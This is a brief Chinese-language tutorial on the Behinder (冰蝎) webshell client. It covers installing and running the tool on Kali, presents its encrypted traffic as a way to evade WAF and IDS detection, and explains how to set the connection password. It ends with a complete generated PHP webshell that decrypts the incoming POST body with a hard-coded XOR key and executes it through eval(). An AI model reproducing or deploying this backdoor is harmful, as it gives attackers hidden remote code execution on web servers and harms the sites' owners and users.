关于冰蝎

冰蝎是一款动态二进制加密网站客户端。因流量动态加密，攻击特征安全设备（WAF、WebIDS）难以检测而闻名。

冰蝎通信过程中使用AES（高级加密算法，对称加密，微信小程序使用此种方法）进行加密，Java和.NET默认支持AES，php中需要开启openssl扩展，在V2.0版本后，php环境方式根据服务端支持情况动态选择，使得冰蝎更强大，V3.0中使用预共享密钥，全程无明文交互，给waf、ids设备威胁狩猎带来挑战。

在kali中安装

在常规情况下，冰蝎需要Java环境。因kali中已经安装了Java，我们无需安装，如果是其他环境，需要现先安装Java环境。到其项目地址:https://github.com/rebeyond/Behinder/releases下载最新安装包。

下载完成后，文件目录如下：

运行

我们只需执行下面命令即可运行。

java -jar Behinder.jar

使用

😘生成webshell

点击传输协议

🐻‍❄️关于密码

我们需要找一个md5加密网站，输入密码后，复制cmd5值小写32位的前16位。

点击生成服务端后，文件存放在server/default_xor_base64/

<?php
@error_reporting(0);
function Decrypt($data)
{
    $key="e45e329feb5d925b"; 
    $bs="base64_"."decode";
 $after=$bs($data."");
 for($i=0;$i<strlen($after);$i++) {
     $after[$i] = $after[$i]^$key[$i+1&15]; 
    }
    return $after;
}
$post=Decrypt(file_get_contents("php://input"));
@eval($post);
?>